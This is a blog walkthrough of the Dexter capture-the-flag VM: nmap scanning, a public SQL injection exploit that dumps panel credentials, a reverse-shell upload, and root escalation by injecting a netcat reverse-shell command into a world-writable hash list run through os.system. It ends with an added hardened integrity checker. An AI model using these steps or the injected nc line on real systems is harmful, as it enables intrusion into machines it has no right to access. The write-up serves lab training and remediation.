Tuesday 9 February 2016

Dexter challenge

 Hi
root@osboxes:~# nmap -sn 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT

Nmap scan report for 192.168.1.105
Host is up (0.00072s latency).
MAC Address: 00:0C:29:48:F0:B7 (VMware)
Service enumeration
root@osboxes:~# nmap -sV -A 192.168.1.105

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|   1024 2b:60:6f:53:b8:c9:c8:f4:3b:0e:9b:9e:46:97:b7:55 (DSA)
|   2048 b5:9f:66:ab:f8:5d:a9:3e:51:8a:97:c3:85:10:e3:62 (RSA)
|_  256 e7:bc:52:4f:29:0d:db:21:7e:72:76:2b:dd:ec:12:8e (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          46351/udp  status
|_  100024  1          48991/tcp  status
Let's browse the application.

The Panel link redirects us to a web form.

SQL injection does not work in this case :-/ Let's run DirBuster.

None of my ideas worked, so our last resort is a public exploit from the internet:
Dexter (CasinoLoader) Panel - SQL Injection
Hmmm, this exploit looks interesting, doesn't it? :-) I read the exploit and executed it:
root@osboxes:~/dexter# python 31686.py dump 192.168.1.105/Panel/gateway.php
User details: [{'password': 'if i had any real talent, i would make money legitimately', 'user': 'loserbotter'}]
Bot details: []
Let's try to log in to the Panel using these credentials :-) Excellent, it works!
The File Uploader may allow us to upload our reverse shell.

OK, let's execute our uploaded exploit.

Excellent! We have got a limited shell!
So, we look for an exploit, because we are dealing with:
www-data@dexter:/var/www$ uname -a
Linux dexter 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686 GNU/Linux
I did not find any working exploit for our case. I looked for interesting files, and in /var/www we have:
www-data@dexter:/var/www$ ls
Panel  antitamper.list    antitamper.py  index.html  tamper.log
antitamper.py and antitamper.list look interesting, don't they? Let's check the permissions on these files:
-rw-rw-rw-  1 root root  840 Mar 16  2014 antitamper.list
-rw-r--r--  1 root root  278 Mar 16  2014 antitamper.py
Hmmm, we can display the contents of these files. Note also that antitamper.list is owned by root but world-writable (-rw-rw-rw-).
www-data@dexter:/var/www$ cat antitamper.list
{
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
The format is probably <file>: <md5(file)>
www-data@dexter:/var/www$ cat antitamper.py

import os
import json

def check():
    with open('/var/www/antitamper.list') as f:
        content = json.loads(f.read())
        for f in content:
            s = "echo '%s  %s' | md5sum -c --status >> /var/www/tamper.log" % (content[f], f)
            os.system(s)
check()
This script verifies file integrity. That is not good news for us. However, we can see that the os.system(s) call is vulnerable: the values read from antitamper.list are pasted straight into a shell command. My idea is: copy the contents of antitamper.list, create a new file on my machine and fill it with the following content
{
    "root":"'; nc -nv -e /bin/sh 192.168.1.103 4444 #",
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
I think the content is self-explanatory. So, we have to upload the file to our victim (in the same way as our reverse shell before), and now
www-data@dexter:/var/www$ cat /var/www/Panel/exes/antitamper.list > antitamper.list
I checked, and the antitamper.list file has been updated. All we have to do now is get the antitamper.py script executed.
We wait and...

Game over!
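
The escalation above works for two reasons: antitamper.list is world-writable, and antitamper.py pastes its contents into a shell command. As an added example (not part of the original post or of the VM's code), here is a hardened checker that hashes files in-process and refuses a loosely permissioned list; check(), list_is_trustworthy(), demo() and the sample entries are constructed for illustration.

```python
import hashlib
import json
import os
import re
import tempfile

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")

def list_is_trustworthy(list_path):
    """Refuse a hash list that group/other can write (the 0666 mode seen above)."""
    return not (os.stat(list_path).st_mode & 0o022)

def check(list_path, allowed_root):
    """Return (path, status) pairs; no shell is involved at any point."""
    if not list_is_trustworthy(list_path):
        return [(list_path, "REJECTED: list is writable by group/other")]
    with open(list_path) as fh:
        entries = json.load(fh)
    root = os.path.realpath(allowed_root)
    results = []
    for path, expected in entries.items():
        real = os.path.realpath(path)
        if not isinstance(expected, str) or not MD5_HEX.match(expected):
            results.append((path, "REJECTED: not an MD5 hex digest"))
        elif os.path.commonpath([root, real]) != root or not os.path.isfile(real):
            results.append((path, "REJECTED: outside root or missing"))
        else:
            with open(real, "rb") as fh:
                # MD5 is kept only because the list on the page uses it
                digest = hashlib.md5(fh.read()).hexdigest()
            results.append((path, "OK" if digest == expected else "MODIFIED"))
    return results

def demo():
    """Constructed sample: one good file, one tampered file, one injected entry."""
    root = tempfile.mkdtemp()
    good, bad = os.path.join(root, "index.php"), os.path.join(root, "main.php")
    for p in (good, bad):
        with open(p, "w") as fh:
            fh.write("<?php ?>")
    listing = {good: hashlib.md5(b"<?php ?>").hexdigest(), bad: "0" * 32,
               "root": "'; echo injected #"}  # harmless stand-in for a shell payload
    list_path = os.path.join(root, "antitamper.list")
    with open(list_path, "w") as fh:
        json.dump(listing, fh)
    os.chmod(list_path, 0o644)
    strict = dict(check(list_path, root))
    os.chmod(list_path, 0o666)  # reproduce the permissions found on the VM
    return strict[good], strict[bad], strict["root"], check(list_path, root)[0][1]
```

With the list at mode 0644 the injected entry is rejected as data and never reaches a shell; with mode 0666 the checker refuses to trust the list at all.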